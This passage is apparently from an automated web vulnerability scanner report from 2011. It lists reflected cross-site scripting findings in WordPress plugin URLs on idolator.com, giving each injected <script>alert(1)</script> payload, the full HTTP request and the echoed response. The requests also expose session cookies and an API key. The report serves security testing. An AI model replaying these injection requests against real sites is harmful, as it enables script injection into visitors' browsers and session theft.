HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.jsb51b1\"><script>alert(1)</script>fb71d8fe0e8?ver=2.8.6" />
...[SNIP]...

4.140. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed291"><script>alert(1)</script>a64e2c6bb6a was submitted in the REST URL parameter 1. This input was echoed as ed291\"><script>alert(1)</script>a64e2c6bb6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contented291"><script>alert(1)</script>a64e2c6bb6a/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:01 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contented291\"><script>alert(1)</script>a64e2c6bb6a/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.141. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9660a"><script>alert(1)</script>6dd36c39f9b was submitted in the REST URL parameter 2. This input was echoed as 9660a\"><script>alert(1)</script>6dd36c39f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9660a"><script>alert(1)</script>6dd36c39f9b/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins9660a\"><script>alert(1)</script>6dd36c39f9b/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.142. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c210"><script>alert(1)</script>a81def3ac26 was submitted in the REST URL parameter 3. This input was echoed as 3c210\"><script>alert(1)</script>a81def3ac26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets3c210"><script>alert(1)</script>a81def3ac26/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:25 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets3c210\"><script>alert(1)</script>a81def3ac26/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.143. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92dfd"><script>alert(1)</script>5ce5a42979 was submitted in the REST URL parameter 4. This input was echoed as 92dfd\"><script>alert(1)</script>5ce5a42979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js92dfd"><script>alert(1)</script>5ce5a42979/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:38 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36041
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js92dfd\"><script>alert(1)</script>5ce5a42979/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.144. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fef5"><script>alert(1)</script>bb99263f410 was submitted in the REST URL parameter 5. This input was echoed as 9fef5\"><script>alert(1)</script>bb99263f410 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js9fef5"><script>alert(1)</script>bb99263f410?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:50 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js9fef5\"><script>alert(1)</script>bb99263f410?ver=2.8.6" />
...[SNIP]...

4.145. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13af3"><script>alert(1)</script>cc47ae3484e was submitted in the REST URL parameter 1. This input was echoed as 13af3\"><script>alert(1)</script>cc47ae3484e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content13af3"><script>alert(1)</script>cc47ae3484e/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content13af3\"><script>alert(1)</script>cc47ae3484e/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.146. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389d7"><script>alert(1)</script>6059268cfdb was submitted in the REST URL parameter 2. This input was echoed as 389d7\"><script>alert(1)</script>6059268cfdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins389d7"><script>alert(1)</script>6059268cfdb/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins389d7\"><script>alert(1)</script>6059268cfdb/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.147. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d47"><script>alert(1)</script>9b30164d27d was submitted in the REST URL parameter 3. This input was echoed as d1d47\"><script>alert(1)</script>9b30164d27d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgetsd1d47"><script>alert(1)</script>9b30164d27d/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:29 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgetsd1d47\"><script>alert(1)</script>9b30164d27d/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.148. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bea"><script>alert(1)</script>d444ad713dd was submitted in the REST URL parameter 4. This input was echoed as 50bea\"><script>alert(1)</script>d444ad713dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js50bea"><script>alert(1)</script>d444ad713dd/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:42 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js50bea\"><script>alert(1)</script>d444ad713dd/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.149. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926b2"><script>alert(1)</script>9cac7e6f268 was submitted in the REST URL parameter 5. This input was echoed as 926b2\"><script>alert(1)</script>9cac7e6f268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js926b2"><script>alert(1)</script>9cac7e6f268?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:54 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js926b2\"><script>alert(1)</script>9cac7e6f268?ver=2.8.6" />
...[SNIP]...

4.150. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd33c"><script>alert(1)</script>f640e7cc530 was submitted in the REST URL parameter 1. This input was echoed as cd33c\"><script>alert(1)</script>f640e7cc530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentcd33c"><script>alert(1)</script>f640e7cc530/plugins/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:36 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contentcd33c\"><script>alert(1)</script>f640e7cc530/plugins/wp-facebookconnect/xd_receiver.php" />
...[SNIP]...

4.151. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf26"><script>alert(1)</script>ddacd7a0384 was submitted in the REST URL parameter 2. This input was echoed as 6cf26\"><script>alert(1)</script>ddacd7a0384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins6cf26"><script>alert(1)</script>ddacd7a0384/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
